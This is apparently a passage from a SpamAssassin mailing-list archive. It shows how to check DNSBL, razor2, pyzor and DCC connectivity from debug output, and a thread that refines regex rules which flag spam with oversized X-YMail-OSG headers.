better DNSBLs to SA 3.2.x like my khop-bl channel).

Testing on a piece of spam:

  spamassassin -D < msg.txt > debug.txt 2>&1

Should reveal (among MANY other lines) output similar to this:

[5841] dbg: async: completed in 0.240 s: DNSBL-A,
dns:A:107.49.73.222.zen.spamhaus.org.
[5841] dbg: async: completed in 0.249 s: URI-DNSBL,
DNSBL:multi.uribl.com.:www.net.cn
[5841] dbg: bayes: score = 1
[5841] dbg: razor2: results: spam? 1
[5841] dbg: pyzor: got response: public.pyzor.org:24441 (200, 'OK') 4 0
[5841] dbg: dcc: dccifd got response: X-DCC-SIHOPE-DCC-3-Metrics:
guardian.ics.com 1085; Body=1 Fuz1=many Fuz2=many


This hit all those flags because I tested on a spam previously run
through 'spamassassin -r' (which teaches Bayes and reports to razor2
and others) ... you should still see results, even if they are ham.
The thing you want in this test is just successful connections to the
servers rather than the spam/ham results.


Re: yahoo X-YMail-OSG

2010-05-24 Thread Adam Katz
My original rule:
 header   SINGLE_HEADER_2K  ALL:raw =~ /^(?=.{2048,3071}$)/m

Karsten Bräckelmann noted:
 It does not match a single header, let alone a *specific*
 header as the one mentioned, but ALL headers. It effectively
 checks the entire headers' size.

Karsten then corrected himself:
 Err, nope -- the size between the beginning and end of a line.

Yup, my test was a single-line header.  Fixed.

header   SINGLE_HEADER_2K   ALL:raw =~
  /(?-xim:(?=(?:^|\n)[^\s\n]+:(?:.(?!\n\S)){2048,3071}.(?:\n\S|$)))/s

Perhaps a regexp efficiency expert should clean it up ... the large
match in the middle using (?:.(?!\n\S)){2048,3071} to keep within a
single header might not be so hot on the PCRE parser; that's a LOT of
looking ahead.  Maybe (?!.{0,2048}\n\S).{2048} and then use meta
rules to exclude larger hits?

 Being the one credited with suggesting it, I would rather just look
 at the X-Ymail-OSG header. I can EASILY get my MTA to block (at the
 gateway) any email with a random header > x in size.
 
 if X-Ymail-OSG is > 1024 bytes, it's just about guaranteed to be
 spam.

Yes, I just wanted to see what examining /any/ header for that kind of
thing would look like.  I've added tests specific to that so we don't
get bogged down waiting for results.

header   MS_XYMOSG_1K   X-YMail-OSG =~ /^(?=.{1024,2047}$)/s
header   MS_XYMOSG_2K   X-YMail-OSG =~ /^(?=.{2048,3071}$)/s
header   MS_XYMOSG_3K   X-YMail-OSG =~ /^(?=.{3072,4095}$)/s
header   MS_XYMOSG_4K   X-YMail-OSG =~ /^(?=.{4096,5119}$)/s
header   MS_XYMOSG_5K   X-YMail-OSG =~ /^(?=.{5120})/s

(I fully expect these to all fold into one or two rules, but it's nice
to see where things sit beforehand.)

Committed revision 947854.

